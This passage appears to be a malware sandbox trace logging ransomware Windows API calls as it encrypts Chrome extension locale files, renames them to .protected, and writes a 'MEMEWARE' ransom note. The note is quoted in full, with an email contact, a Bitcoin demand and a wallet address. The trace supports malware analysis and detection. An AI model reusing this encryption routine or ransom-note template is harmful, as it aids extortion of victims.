Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json") returned 155 [0079.073] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.073] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json") returned 155 [0079.073] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.073] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x10a, lpOverlapped=0x0) returned 1 [0079.074] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.074] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x10a, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x10a, lpOverlapped=0x0) returned 1 [0079.074] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.074] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.074] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.075] CloseHandle (hObject=0x168) returned 1 [0079.075] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json.protected") returned 165 [0079.075] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json.protected")) returned 1 [0079.075] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.075] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.075] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\RESTORE_FILES.txt") returned 159 [0079.075] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.075] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.075] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.076] lstrlenA (lpString="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") returned 684 [0079.076] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0079.076] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.076] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.076] CloseHandle (hObject=0x164) returned 1 [0079.076] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.076] lstrcmpiW (lpString1="sk", lpString2="Windows") returned -1 [0079.076] lstrcmpiW (lpString1="sk", lpString2="Program Files") returned 1 [0079.076] lstrcmpiW (lpString1="sk", lpString2="Program Files (x86)") returned 1 [0079.076] lstrcmpiW (lpString1="sk", lpString2="$Recycle.bin") returned 1 [0079.076] lstrcmpiW (lpString1="sk", lpString2="System Volume Information") returned -1 [0079.076] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk") returned 141 [0079.077] lstrcmpW (lpString1="sk", lpString2=".") returned 1 [0079.077] lstrcmpW (lpString1="sk", lpString2="..") returned 1 [0079.077] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\*") returned 143 [0079.077] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.077] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0079.077] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.077] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.077] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.077] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.077] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\.") returned 143 [0079.077] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.077] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.077] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.077] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.077] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.077] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.077] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.077] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\..") returned 144 [0079.077] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.077] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.077] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.077] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.077] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.077] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 
[0079.077] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.077] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.077] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json") returned 155 [0079.077] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.077] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.077] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.077] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.077] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.078] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json") returned 155 [0079.078] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.078] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json") returned 155 [0079.078] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.078] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json") returned 155 [0079.078] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.078] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0079.079] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.079] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0079.079] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.079] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.079] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.080] CloseHandle (hObject=0x168) returned 1 [0079.080] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json.protected") returned 165 [0079.080] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json.protected")) returned 1 [0079.080] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.080] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.080] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\RESTORE_FILES.txt") returned 159 [0079.080] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.080] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.081] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.081] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.081] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.081] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.081] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.081] CloseHandle (hObject=0x164) returned 1 [0079.081] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.082] lstrcmpiW (lpString1="sl", lpString2="Windows") returned -1 [0079.082] lstrcmpiW (lpString1="sl", lpString2="Program Files") returned 1 [0079.082] lstrcmpiW (lpString1="sl", lpString2="Program Files (x86)") returned 1 [0079.082] lstrcmpiW (lpString1="sl", lpString2="$Recycle.bin") returned 1 [0079.082] lstrcmpiW (lpString1="sl", lpString2="System Volume Information") returned -1 [0079.082] wnsprintfW (in: 
pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl") returned 141 [0079.082] lstrcmpW (lpString1="sl", lpString2=".") returned 1 [0079.082] lstrcmpW (lpString1="sl", lpString2="..") returned 1 [0079.082] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\*") returned 143 [0079.082] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.082] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.082] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.082] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.082] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.082] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.082] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\.") returned 143 [0079.082] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.082] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.082] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.082] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.082] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.082] 
lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.082] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.082] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\..") returned 144 [0079.082] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.082] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.082] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.082] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.082] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.082] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.083] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.083] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.083] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json") returned 155 [0079.083] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.083] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.083] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.083] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.083] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.083] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json") returned 155 [0079.083] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.083] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json") returned 155 [0079.083] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.083] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json") returned 155 [0079.083] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.083] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xda, lpOverlapped=0x0) returned 1 [0079.084] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff26, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.084] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xda, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xda, lpOverlapped=0x0) returned 1 [0079.084] SetFilePointerEx (in: hFile=0x168, 
